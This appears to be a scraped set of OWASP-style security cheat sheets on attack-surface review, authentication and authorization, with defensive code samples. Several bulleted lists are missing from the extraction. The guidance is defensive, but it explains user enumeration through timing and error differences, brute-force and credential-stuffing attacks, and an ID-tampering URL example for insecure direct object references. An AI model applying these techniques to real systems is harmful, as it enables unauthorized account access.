If you add another web page that follows the same design and uses the same technology as existing web pages, it's easy to understand how much security testing and review it needs. If you add a new web services API or file that can be uploaded from the Internet, each of these changes has a different risk profile again - see if the change fits in an existing bucket, see if the existing controls and protections apply. If you're adding something that doesn't fall into an existing bucket, this means that you have to go through a more thorough risk assessment to understand what kind of security holes you may open and what protections you need to put in place.

Changes to session management, authentication and password management directly affect the Attack Surface and need to be reviewed. So do changes to authorization and access control logic, especially adding or changing role definitions, adding admin users, or adding admin functions with high privileges. The same applies to changes to the code that handles encryption and secrets, to fundamental changes in how data validation is done, and to major architectural changes to layering and trust relationships, or fundamental changes in technical architecture \u2013 swapping out your web server or database platform, or changing the runtime operating system.

As you add new user types or roles or privilege levels, you do the same kind of analysis and risk assessment. Overlay the type of access across the data and functions and look for problems and inconsistencies. It's important to understand the access model for the application, whether it is positive (access is deny by default) or negative (access is allow by default). In a positive access model, any mistakes in defining what data or functions are permitted to a new user type or role are easy to see. In a negative access model, you have to be much more careful to ensure that a user does not get access to data/functions that they should not be permitted to.

This kind of threat or risk assessment can be done periodically, or as a part of design work in serial / phased / spiral / waterfall development projects, or continuously and incrementally in Agile / iterative development.

Normally, an application's Attack Surface will increase over time as you add more interfaces and user types and integrate with other systems. You also want to look for ways to reduce the size of the Attack Surface when you can by simplifying the model (reducing the number of user levels for example or not storing confidential data that you don't absolutely have to), turning off features and interfaces that aren't being used, by introducing operational controls such as a Web Application Firewall (WAF) and real-time application-specific attack detection.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html","title":"Authentication Cheat Sheet","text":""},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Authentication is the process of verifying that an individual, entity or website is who it claims to be. Authentication in the context of web applications is commonly performed by submitting a username or ID and one or more items of private information that only a given user should know.

Session Management is a process by which a server maintains the state of an entity interacting with it. This is required for a server to remember how to react to subsequent requests throughout a transaction. Sessions are maintained on the server by a session identifier which can be passed back and forth between the client and server when transmitting and receiving requests. Sessions should be unique per user and computationally very difficult to predict. The Session Management Cheat Sheet contains further guidance on the best practices in this area.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#authentication-general-guidelines","title":"Authentication General Guidelines","text":""},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#user-ids","title":"User IDs","text":"

Make sure your usernames/user IDs are case-insensitive. User 'smith' and user 'Smith' should be the same user. Usernames should also be unique. For high-security applications, usernames could be assigned and secret instead of user-defined public data.
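
A minimal sketch of such normalization (TypeScript; the locale handling shown is a simplification):

// Normalize user-supplied identifiers so 'Smith' and 'smith' resolve to the same account
function normalizeUsername(raw: string): string {
  return raw.trim().toLowerCase();
}

normalizeUsername("  Smith ") === normalizeUsername("smith"); // true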

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#email-address-as-a-user-id","title":"Email address as a User ID","text":"

For information on validating email addresses, please visit the input validation cheatsheet email discussion.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#authentication-solution-and-sensitive-accounts","title":"Authentication Solution and Sensitive Accounts","text":""},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#implement-proper-password-strength-controls","title":"Implement Proper Password Strength Controls","text":"

A key concern when using passwords for authentication is password strength. A \"strong\" password policy makes it difficult or even improbable for one to guess the password through either manual or automated means. The following characteristics define a strong password:

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#for-more-detailed-information-check","title":"For more detailed information check","text":""},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#implement-secure-password-recovery-mechanism","title":"Implement Secure Password Recovery Mechanism","text":"

It is common for an application to have a mechanism that provides a means for a user to gain access to their account in the event they forget their password. Please see Forgot Password Cheat Sheet for details on this feature.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#store-passwords-in-a-secure-fashion","title":"Store Passwords in a Secure Fashion","text":"

It is critical for an application to store a password using the right cryptographic technique. Please see Password Storage Cheat Sheet for details on this feature.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#compare-password-hashes-using-safe-functions","title":"Compare Password Hashes Using Safe Functions","text":"

Where possible, the user-supplied password should be compared to the stored password hash using a secure password comparison function provided by the language or framework, such as the password_verify() function in PHP. Where this is not possible, ensure that the comparison function:
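
A minimal sketch of the same idea outside PHP (assuming a Node.js/TypeScript backend and the built-in crypto module; the scrypt parameters are illustrative, see the Password Storage Cheat Sheet for recommended settings):

import { randomBytes, scryptSync, timingSafeEqual } from "crypto";

// At registration: derive and store salt + hash
function hashPassword(password: string): { salt: string; hash: string } {
  const salt = randomBytes(16).toString("hex");
  const hash = scryptSync(password, salt, 64).toString("hex");
  return { salt, hash };
}

// At login: recompute and compare in constant time to avoid timing leaks
function verifyPassword(password: string, salt: string, storedHash: string): boolean {
  const candidate = scryptSync(password, salt, 64);
  return timingSafeEqual(candidate, Buffer.from(storedHash, "hex"));
}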

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#change-password-feature","title":"Change Password Feature","text":"

When developing a change password feature, ensure that you have:

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#transmit-passwords-only-over-tls-or-other-strong-transport","title":"Transmit Passwords Only Over TLS or Other Strong Transport","text":"

See: Transport Layer Protection Cheat Sheet

The login page and all subsequent authenticated pages must be exclusively accessed over TLS or other strong transport. Failure to utilize TLS or other strong transport for the login page allows an attacker to modify the login form action, causing the user's credentials to be posted to an arbitrary location. Failure to utilize TLS or other strong transport for authenticated pages after login enables an attacker to view the unencrypted session ID and compromise the user's authenticated session.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#require-re-authentication-for-sensitive-features","title":"Require Re-authentication for Sensitive Features","text":"

In order to mitigate CSRF and session hijacking, it's important to require the current credentials for an account before updating sensitive account information such as the user's password, user's email, or before sensitive transactions, such as shipping a purchase to a new address. Without this countermeasure, an attacker may be able to execute sensitive transactions through a CSRF or XSS attack without needing to know the user's current credentials. Additionally, an attacker may get temporary physical access to a user's browser or steal their session ID to take over the user's session.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#consider-strong-transaction-authentication","title":"Consider Strong Transaction Authentication","text":"

Some applications should use a second factor to check whether a user may perform sensitive operations. For more information, see the Transaction Authorization Cheat Sheet.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#tls-client-authentication","title":"TLS Client Authentication","text":"

TLS Client Authentication, also known as two-way TLS authentication, consists of both the browser and the server sending their respective TLS certificates during the TLS handshake process. Just as you can validate the authenticity of a server by using the certificate and asking a well-known Certificate Authority (CA) if the certificate is valid, the server can authenticate the user by receiving a certificate from the client and validating it against a third-party CA or its own CA. To do this, the server must provide the user with a certificate generated specifically for them, assigning values to the subject so that these can be used to determine what user the certificate should validate. The user installs the certificate in a browser and now uses it for the website.

It is a good idea to do this when:

It is generally not a good idea to use this method for widely and publicly available websites that will have an average user. For example, it wouldn't be a good idea to implement this for a website like Facebook. While this technique can prevent the user from having to type a password (thus preventing an average keylogger from stealing it), it is still a good idea to consider using both a password and TLS client authentication combined.

Additionally, if the client is behind an enterprise proxy which performs SSL/TLS decryption, this will break certificate authentication unless the site is allowed on the proxy.

For more information, see: Client-authenticated TLS handshake
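
As an illustration, a minimal sketch of a server requiring client certificates (Node.js/TypeScript; the certificate file names and the port are hypothetical):

import { readFileSync } from "fs";
import { createServer } from "https";
import type { TLSSocket } from "tls";

const server = createServer(
  {
    key: readFileSync("server-key.pem"),
    cert: readFileSync("server-cert.pem"),
    ca: readFileSync("client-ca.pem"), // CA that issued the client certificates
    requestCert: true,                 // ask the client for its certificate during the handshake
    rejectUnauthorized: true,          // drop connections without a valid client certificate
  },
  (req, res) => {
    const peer = (req.socket as TLSSocket).getPeerCertificate();
    res.end(`Hello ${peer.subject?.CN ?? "client"}`); // the subject identifies the authenticated user
  }
);

server.listen(8443);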

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#authentication-and-error-messages","title":"Authentication and Error Messages","text":"

Incorrectly implemented error messages in the case of authentication functionality can be used for the purposes of user ID and password enumeration. An application should respond (both HTTP and HTML) in a generic manner.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#authentication-responses","title":"Authentication Responses","text":"

Using any of the authentication mechanisms (login, password reset or password recovery), an application must respond with a generic error message regardless of whether:

The account registration feature should also be taken into consideration, and the same approach of generic error message can be applied regarding the case in which the user exists.

The objective is to prevent the creation of a discrepancy factor, allowing an attacker to mount a user enumeration action against the application.

It is interesting to note that the business logic itself can bring a discrepancy factor related to the processing time taken. Indeed, depending on the implementation, the processing time can be significantly different according to the case (success vs failure) allowing an attacker to mount a time-based attack (delta of some seconds for example).

Example using pseudo-code for a login feature:

IF USER_EXISTS(username) THEN\n    password_hash=HASH(password)\n    IS_VALID=LOOKUP_CREDENTIALS_IN_STORE(username, password_hash)\n    IF NOT IS_VALID THEN\n        RETURN Error(\"Invalid Username or Password!\")\n    ENDIF\nELSE\n   RETURN Error(\"Invalid Username or Password!\")\nENDIF\n

It can be clearly seen that if the user doesn't exist, the application will directly throw an error. Otherwise, when the user exists but the password is wrong, it is apparent that there will be more processing before the application errors out. As a result, the response time will be different for the same error, allowing the attacker to differentiate between a wrong username and a wrong password.

password_hash=HASH(password)\nIS_VALID=LOOKUP_CREDENTIALS_IN_STORE(username, password_hash)\nIF NOT IS_VALID THEN\n   RETURN Error(\"Invalid Username or Password!\")\nENDIF\n

This code will go through the same process no matter what the user or the password is, allowing the application to return in approximately the same response time.

The problem with returning a generic error message for the user is a User Experience (UX) matter. A legitimate user might feel confused with the generic messages, thus making it hard for them to use the application, and might after several retries, leave the application because of its complexity. The decision to return a generic error message can be determined based on the criticality of the application and its data. For example, for critical applications, the team can decide that under the failure scenario, a user will always be redirected to the support page and a generic error message will be returned.

Regarding user enumeration itself, protections against brute-force attacks are also effective because they prevent an attacker from applying the enumeration at scale. A CAPTCHA can be applied on a feature for which a generic error message cannot be returned because the user experience must be preserved.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#incorrect-and-correct-response-examples","title":"Incorrect and correct response examples","text":""},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#login","title":"Login","text":"

Incorrect response examples:

Correct response example:

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#password-recovery","title":"Password recovery","text":"

Incorrect response examples:

Correct response example:

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#account-creation","title":"Account creation","text":"

Incorrect response examples:

Correct response example:

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#error-codes-and-urls","title":"Error Codes and URLs","text":"

The application may return a different HTTP error code depending on the outcome of the authentication attempt. For example, it may respond with a 200 for a positive result and a 403 for a negative result. Even though a generic error page is shown to the user, the HTTP response code may differ, which can leak information about whether the account is valid or not.
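As an illustration, a minimal sketch (assuming a Spring MVC style controller; the authenticate helper is a placeholder) that returns the same status code and the same generic body for every failed attempt, regardless of the underlying cause:

```java
import org.springframework.http.HttpStatus;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.RestController;

@RestController
public class LoginController {

    @PostMapping("/login")
    public ResponseEntity<String> login(@RequestParam String username,
                                        @RequestParam String password) {
        if (authenticate(username, password)) {
            return ResponseEntity.ok("Login successful");
        }
        // Same status code and same generic body whether the username is unknown,
        // the password is wrong, or the account is disabled.
        return ResponseEntity.status(HttpStatus.UNAUTHORIZED)
                             .body("Invalid Username or Password!");
    }

    private boolean authenticate(String username, String password) {
        return false; // placeholder for the real credential check
    }
}
```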

Error disclosure can also be used as a discrepancy factor; consult the Error Handling Cheat Sheet regarding the global handling of different errors in an application.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#protect-against-automated-attacks","title":"Protect Against Automated Attacks","text":"

There are a number of different types of automated attacks that attackers can use to try and compromise user accounts. The most common types are listed below:

| Attack Type | Description |
|---|---|
| Brute Force | Testing multiple passwords from a dictionary or other source against a single account. |
| Credential Stuffing | Testing username/password pairs obtained from the breach of another site. |
| Password Spraying | Testing a single weak password against a large number of different accounts. |

Different protection mechanisms can be implemented to protect against these attacks. In many cases, these defences do not provide complete protection, but when a number of them are implemented in a defence-in-depth approach, a reasonable level of protection can be achieved.

The following sections will focus primarily on preventing brute-force attacks, although these controls can also be effective against other types of attacks. For further guidance on defending against credential stuffing and password spraying, see the Credential Stuffing Cheat Sheet.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#multi-factor-authentication","title":"Multi-Factor Authentication","text":"

Multi-factor authentication (MFA) is by far the best defence against the majority of password-related attacks, including brute-force attacks, with analysis by Microsoft suggesting that it would have stopped 99.9% of account compromises. As such, it should be implemented wherever possible; however, depending on the audience of the application, it may not be practical or feasible to enforce the use of MFA.

The Multifactor Authentication Cheat Sheet contains further guidance on implementing MFA.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#login-throttling","title":"Login Throttling","text":"

Login throttling is a mechanism used to prevent an attacker from making too many attempts at guessing a password through normal interactive means. It includes:

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#account-lockout","title":"Account Lockout","text":"

The most common protection against these attacks is to implement account lockout, which prevents any more login attempts for a period after a certain number of failed logins.

The counter of failed logins should be associated with the account itself, rather than the source IP address, in order to prevent an attacker from making login attempts from a large number of different IP addresses. There are a number of different factors that should be considered when implementing an account lockout policy in order to find a balance between security and usability:

Rather than implementing a fixed lockout duration (e.g., ten minutes), some applications use an exponential lockout, where the lockout duration starts as a very short period (e.g., one second), but doubles after each failed login attempt.
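A minimal sketch of the exponential lockout calculation described above (the one-second base, the doubling per failed attempt and the one-hour cap are illustrative assumptions):

```java
import java.time.Duration;

/** Illustrative exponential lockout calculation; thresholds are assumptions. */
public final class LockoutPolicy {

    private static final Duration BASE = Duration.ofSeconds(1);
    private static final Duration MAX  = Duration.ofHours(1);

    private LockoutPolicy() { }

    /** Lockout duration after the given number of consecutive failed logins. */
    public static Duration lockoutAfter(int failedAttempts) {
        if (failedAttempts <= 0) {
            return Duration.ZERO;
        }
        // 1s, 2s, 4s, 8s, ... doubling per failure, shift capped to avoid overflow.
        long seconds = BASE.getSeconds() << Math.min(failedAttempts - 1, 30);
        Duration lockout = Duration.ofSeconds(seconds);
        return lockout.compareTo(MAX) > 0 ? MAX : lockout;
    }
}
```

With these assumed values, lockoutAfter(1) is one second, lockoutAfter(5) is sixteen seconds, and further failures quickly reach the cap.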

When designing an account lockout system, care must be taken to prevent it from being used to cause a denial of service by locking out other users' accounts. One way to mitigate this is to allow a user to log in through the forgotten password flow even while the account is locked out.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#captcha","title":"CAPTCHA","text":"

The use of an effective CAPTCHA can help to prevent automated login attempts against accounts. However, many CAPTCHA implementations have weaknesses that allow them to be solved using automated techniques or can be outsourced to services which can solve them. As such, the use of CAPTCHA should be viewed as a defence-in-depth control to make brute-force attacks more time consuming and expensive, rather than as a preventative.

It may be more user-friendly to only require a CAPTCHA be solved after a small number of failed login attempts, rather than requiring it from the very first login.
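One way to express that idea, as a tiny sketch (the threshold and the failed-attempt counter are assumptions; the actual CAPTCHA verification is out of scope here):

```java
/** Sketch only: decide when a CAPTCHA must accompany the login attempt. */
public final class CaptchaGate {

    // Assumed threshold: no CAPTCHA for the first few attempts, keeping the
    // normal login flow friction-free for legitimate users.
    private static final int FAILED_ATTEMPTS_BEFORE_CAPTCHA = 3;

    private CaptchaGate() { }

    public static boolean captchaRequired(int recentFailedAttempts) {
        return recentFailedAttempts >= FAILED_ATTEMPTS_BEFORE_CAPTCHA;
    }
}
```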

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#security-questions-and-memorable-words","title":"Security Questions and Memorable Words","text":"

The addition of a security question or memorable word can also help protect against automated attacks, especially when the user is asked to enter a number of randomly chosen characters from the word. It should be noted that this does not constitute multi-factor authentication, as both factors are the same (something you know). Furthermore, security questions are often weak and have predictable answers, so they must be carefully chosen. The Choosing and Using Security Questions cheat sheet contains further guidance on this.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#logging-and-monitoring","title":"Logging and Monitoring","text":"

Enable logging and monitoring of authentication functions to detect attacks and failures in real time.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#use-of-authentication-protocols-that-require-no-password","title":"Use of authentication protocols that require no password","text":"

While authentication through a username/password combination with multi-factor authentication is generally considered secure, there are use cases where it isn't the best option or even safe. Examples are third-party applications that want to connect to the web application, whether from a mobile device, another website, a desktop application or other situations. In such cases it is NOT considered safe to allow the third-party application to store the user/password combination, since that extends the attack surface to code and storage outside your control. For this and other use cases, there are several authentication protocols that can protect you from exposing your users' data to attackers.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#oauth","title":"OAuth","text":"

Open Authorization (OAuth) is a protocol that allows an application to authenticate against a server as a user, without requiring passwords or any third-party server that acts as an identity provider. It uses a token generated by the server and defines how the authorization flows occur, so that a client, such as a mobile application, can tell the server which user is using the service.

The recommendation is to use and implement OAuth 1.0a or OAuth 2.0, since the very first version (OAuth 1.0) has been found to be vulnerable to session fixation.

OAuth 2.0 relies on HTTPS for security and is currently used and implemented by APIs from companies such as Facebook, Google, Twitter and Microsoft. OAuth 1.0a is more difficult to use because it requires cryptographic libraries for digital signatures. However, since OAuth 1.0a does not rely on HTTPS for security, it can be more suited to higher-risk transactions.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#openid","title":"OpenId","text":"

OpenId is an HTTP-based protocol that uses identity providers to validate that a user is who they say they are. It is a very simple protocol which allows service-provider-initiated single sign-on (SSO). It lets the user re-use a single identity given to a trusted OpenId identity provider and be the same user on multiple websites, without providing any website with the password, except for the OpenId identity provider.

Because of its simplicity and because it protects the user's password, OpenId has been well adopted. Some of the well-known identity providers for OpenId are Stack Exchange, Google, Facebook and Yahoo!

For non-enterprise environments, OpenId is considered a secure and often better choice, as long as the identity provider is trusted.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#saml","title":"SAML","text":"

Security Assertion Markup Language (SAML) is often considered to compete with OpenId. The most recommended version is 2.0 since it is very feature-complete and provides strong security. Like OpenId, SAML uses identity providers, but unlike OpenId, it is XML-based and provides more flexibility. SAML is based on browser redirects which send XML data. Furthermore, SAML isn't only initiated by a service provider; it can also be initiated from the identity provider. This allows the user to navigate through different portals while still being authenticated without having to do anything, making the process transparent.

While OpenId has taken most of the consumer market, SAML is often the choice for enterprise applications. The reason is often that there are few OpenId identity providers considered enterprise-class (meaning that the way they validate the user's identity doesn't meet the high standards required for enterprise identity). It is more common to see SAML being used inside intranet websites, sometimes even using a server from the intranet as the identity provider.

In the past few years, applications like SAP ERP and SharePoint (the latter via Active Directory Federation Services 2.0) have adopted SAML 2.0 authentication as a preferred method for single sign-on implementations whenever enterprise federation is required for web services and web applications.

See also: SAML Security Cheat Sheet

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#fido","title":"FIDO","text":"

The Fast Identity Online (FIDO) Alliance has created two protocols to facilitate online authentication: the Universal Authentication Framework (UAF) protocol and the Universal Second Factor (U2F) protocol. While UAF focuses on passwordless authentication, U2F allows the addition of a second factor to existing password-based authentication. Both protocols are based on a public key cryptography challenge-response model.

UAF takes advantage of existing security technologies present on devices for authentication, including fingerprint sensors, cameras (face biometrics), microphones (voice biometrics), Trusted Execution Environments (TEEs), Secure Elements (SEs) and others. The protocol is designed to plug these device capabilities into a common authentication framework. UAF works with both native applications and web applications.

U2F augments password-based authentication using a hardware token (typically USB) that stores cryptographic authentication keys and uses them for signing. The user can use the same token as a second factor for multiple applications. U2F works with web applications. It provides protection against phishing by using the URL of the website to look up the stored authentication key.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#password-managers","title":"Password Managers","text":"

Password managers are programs, browser plugins or web services that automate the management of a large number of different credentials. Most password managers have functionality that allows users to use them easily on websites, either by pasting the passwords into the login form or by simulating the user typing them in.

Web applications should not make the password managers' job more difficult than necessary; they can achieve this by observing the following recommendations:

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html","title":"Authorization Cheat Sheet","text":""},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Authorization may be defined as \"the process of verifying that a requested action or service is approved for a specific entity\" (NIST). Authorization is distinct from authentication, which is the process of verifying an entity's identity. When designing and developing a software solution, it is important to keep these distinctions in mind. A user who has been authenticated (perhaps by providing a username and password) is often not authorized to access every resource and perform every action that is technically possible through a system. For example, a web app may have both regular users and admins, with the admins being able to perform actions the average user is not privileged to perform, even though they have been authenticated. Additionally, authentication is not always required for accessing resources; an unauthenticated user may be authorized to access certain public resources, such as an image or login page, or even an entire web app.

The objective of this cheat sheet is to assist developers in implementing authorization logic that is robust, appropriate to the app's business context, maintainable, and scalable. The guidance provided in this cheat sheet should be applicable to all phases of the development lifecycle and flexible enough to meet the needs of diverse development environments.

Flaws related to authorization logic are a notable concern for web apps. Broken Access Control was ranked as the most concerning web security vulnerability in OWASP's 2021 Top 10 and asserted to have a \"High\" likelihood of exploit by MITRE's CWE program. Furthermore, according to Veracode's State of Software Vol. 10, Access Control was among the more common of OWASP's Top 10 risks to be involved in exploits and security incidents despite being among the least prevalent of those examined.

The potential impact resulting from exploitation of authorization flaws is highly variable, both in form and severity. Attackers may be able to read, create, modify, or delete resources that were meant to be protected (thus jeopardizing their confidentiality, integrity, and/or availability); however, the actual impact of such actions is necessarily linked to the criticality and sensitivity of the compromised resources. Thus, the business cost of a successfully exploited authorization flaw can range from very low to extremely high.

Both entirely unauthenticated outsiders and authenticated (but not necessarily authorized) users can take advantage of authorization weaknesses. Although honest mistakes or carelessness on the part of non-malicious entities may enable authorization bypasses, malicious intent is typically required for access control threats to be fully realized. Horizontal privilege elevation (i.e. being able to access another user's resources) is an especially common weakness that an authenticated user may be able to take advantage of. Faults related to authorization control can allow malicious insiders and outsiders alike to view, modify, or delete sensitive resources of all forms (database records, static files, personally identifiable information (PII), etc.) or perform actions, such as creating a new account or initiating a costly order, that they should not be privileged to do. Furthermore, if logging related to access control is not properly set up, such authorization violations may go undetected or at least remain unattributable to a particular individual or group.

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#recommendations","title":"Recommendations","text":""},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#enforce-least-privileges","title":"Enforce Least Privileges","text":"

As a security concept, Least Privileges refers to the principle of assigning users only the minimum privileges necessary to complete their job. Although perhaps most commonly applied in system administration, this principle has relevance to the software developer as well. Least Privileges must be applied both horizontally and vertically. For example, even though both an accountant and sales representative may occupy the same level in an organization's hierarchy, both require access to different resources to perform their jobs. The accountant should likely not be granted access to a customer database and the sales representative should not be able to access payroll data. Similarly, the head of the sales department is likely to need more privileged access than their subordinates.

Failure to enforce least privileges in an application can jeopardize the confidentiality of sensitive resources. Mitigation strategies are applied primarily during the Architecture and Design phase (see CWE-272); however, the principle must be addressed throughout the SDLC.

Consider the following points and best practices:

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#deny-by-default","title":"Deny by Default","text":"

Even when no access control rules are explicitly matched, the application cannot remain neutral when an entity is requesting access to a particular resource. The application must always make a decision, whether implicitly or explicitly, to either deny or permit the requested access. Logic errors and other mistakes relating to access control may happen, especially when access requirements are complex; consequently, one should not rely entirely on explicitly defined rules for matching all possible requests. For security purposes an application should be configured to deny access by default.
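A minimal sketch of the principle (Rule and AccessRequest are hypothetical types): when no rule explicitly matches, the decision falls through to deny.

```java
import java.util.List;
import java.util.Optional;

/** Deny-by-default evaluation sketch; Rule and AccessRequest are illustrative. */
public class AccessDecisionService {

    public interface Rule {
        boolean matches(AccessRequest request);
        boolean permits(AccessRequest request);
    }

    public record AccessRequest(String subject, String action, String resource) { }

    private final List<Rule> rules;

    public AccessDecisionService(List<Rule> rules) {
        this.rules = rules;
    }

    public boolean isAllowed(AccessRequest request) {
        Optional<Rule> matching = rules.stream()
                .filter(rule -> rule.matches(request))
                .findFirst();

        // No explicit match, or an explicit non-permit, both result in denial.
        return matching.map(rule -> rule.permits(request)).orElse(false);
    }
}
```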

Consider the following points and best practices:

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#validate-the-permissions-on-every-request","title":"Validate the Permissions on Every Request","text":"

Permissions should be validated correctly on every request, regardless of whether the request was initiated by an AJAX script, by server-side code, or from any other source. The technology used to perform such checks should allow for global, application-wide configuration rather than needing to be applied individually to every method or class. Remember that an attacker only needs to find one way in. Even if just a single access control check is \"missed\", the confidentiality and/or integrity of a resource can be jeopardized. Validating permissions correctly on just the majority of requests is insufficient. Specific technologies that can help developers perform such consistent permission checks include the following:
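Whatever technology is chosen, the check itself can be applied globally. For instance, a minimal sketch (assuming a Jakarta Servlet environment; all names are illustrative) of a filter that enforces a permission check on every request instead of scattering checks through individual methods:

```java
import jakarta.servlet.Filter;
import jakarta.servlet.FilterChain;
import jakarta.servlet.ServletException;
import jakarta.servlet.ServletRequest;
import jakarta.servlet.ServletResponse;
import jakarta.servlet.annotation.WebFilter;
import jakarta.servlet.http.HttpServletRequest;
import jakarta.servlet.http.HttpServletResponse;
import java.io.IOException;

/** Applies the permission check globally rather than method by method. */
@WebFilter("/*")
public class AuthorizationFilter implements Filter {

    /** Hypothetical decision point; a deny-by-default implementation plugs in here. */
    public interface PermissionChecker {
        boolean isAllowed(String subject, String httpMethod, String uri);
    }

    private final PermissionChecker checker = (subject, method, uri) -> false; // deny until configured

    @Override
    public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain)
            throws IOException, ServletException {
        HttpServletRequest request = (HttpServletRequest) req;
        HttpServletResponse response = (HttpServletResponse) res;

        String subject = request.getRemoteUser(); // null for anonymous callers

        if (checker.isAllowed(subject, request.getMethod(), request.getRequestURI())) {
            chain.doFilter(req, res);
        } else {
            // Missed or failed checks result in denial for every request path.
            response.sendError(HttpServletResponse.SC_FORBIDDEN);
        }
    }
}
```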

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#thoroughly-review-the-authorization-logic-of-chosen-tools-and-technologies-implementing-custom-logic-if-necessary","title":"Thoroughly Review the Authorization Logic of Chosen Tools and Technologies, Implementing Custom Logic if Necessary","text":"

Today's developers have access to a vast number of libraries, platforms, and frameworks that allow them to incorporate robust, complex logic into their apps with minimal effort. However, these frameworks and libraries must not be viewed as a quick panacea for all development problems; developers have a duty to use such frameworks responsibly and wisely. Two general concerns relevant to framework/library selection with respect to proper access control are misconfiguration or lack of configuration on the part of the developer and vulnerabilities within the components themselves (see A6 and A9 for general guidance on these topics).

Even in an otherwise securely developed application, vulnerabilities in third-party components can allow an attacker to bypass normal authorization controls. Such concerns need not be restricted to unproven or poorly maintained projects, but affect even the most robust and popular libraries and frameworks. Writing complex, secure software is hard. Even the most competent developers, working on high-quality libraries and frameworks, will make mistakes. Assume any third-party component you incorporate into an application could be or become subject to an authorization vulnerability. Important considerations include:

Misconfiguration (or complete lack of configuration) is another major area in which the components developers build upon can lead to broken authorization. These components are typically intended to be relatively general purpose tools made to appeal to a wide audience. For all but the simplest use cases, these frameworks and libraries must be customized or supplemented with additional logic in order to meet the unique requirements of a particular app or environment. This consideration is especially important when security requirements, including authorization, are concerned. Notable configuration considerations for authorization include the following:

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#prefer-attribute-and-relationship-based-access-control-over-rbac","title":"Prefer Attribute and Relationship Based Access Control over RBAC","text":"

In software engineering, two basic forms of access control are widely utilized: Role-Based Access Control (RBAC) and Attribute-Based Access Control (ABAC). There is a third, more recent, model which has gained popularity: Relationship-Based Access Control (ReBAC). The decision between the models has significant implications for the entire SDLC and should be made as early as possible.
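To make the distinction concrete, a minimal sketch (the User and Document types and the EDITOR role are illustrative) contrasting a role-only check with an attribute/relationship-based check:

```java
/** Sketch only: the same "can the user edit this document?" question under two models. */
public class EditPolicy {

    public record User(String id, java.util.Set<String> roles, String department) { }
    public record Document(String ownerId, String department, boolean archived) { }

    /** RBAC: the decision depends only on the role held by the user. */
    public boolean canEditRbac(User user) {
        return user.roles().contains("EDITOR");
    }

    /**
     * ABAC/ReBAC: the decision combines attributes of the subject and the resource
     * and their relationship (ownership), which a role check alone cannot express.
     */
    public boolean canEditAbac(User user, Document doc) {
        boolean isOwner = doc.ownerId().equals(user.id());
        boolean sameDepartment = doc.department().equals(user.department());
        return !doc.archived() && (isOwner || (sameDepartment && user.roles().contains("EDITOR")));
    }
}
```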

Although RBAC has a long history and remains popular among software developers today, ABAC and ReBAC should typically be preferred for application development. Their advantages over RBAC include:

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#ensure-lookup-ids-are-not-accessible-even-when-guessed-or-cannot-be-tampered-with","title":"Ensure Lookup IDs are Not Accessible Even When Guessed or Cannot Be Tampered With","text":"

Applications often expose the internal object identifiers (such as an account number or a primary key in a database) that are used to locate and reference an object. This ID may be exposed as a query parameter, a path variable, a \"hidden\" form field or elsewhere. For example:

https://mybank.com/accountTransactions?acct_id=901

Based on this URL, one could reasonably assume that the application will return a listing of transactions and that the transactions returned will be restricted to a particular account - the account indicated in the acct_id param. But what would happen if the user changed the value of the acct_id param to another value, such as 523? Will the user be able to view transactions associated with another account even if it does not belong to them? If not, will the failure simply be the result of the account \"523\" not existing/not being found, or will it be due to a failed access control check? Although this example may be an oversimplification, it illustrates a very common security flaw in application development - CWE-639: Authorization Bypass Through User-Controlled Key. When exploited, this weakness can result in authorization bypasses, horizontal privilege escalation and, less commonly, vertical privilege escalation (see CWE-639). This type of vulnerability also represents a form of Insecure Direct Object Reference (IDOR). The following paragraphs will describe the weakness and possible mitigations.

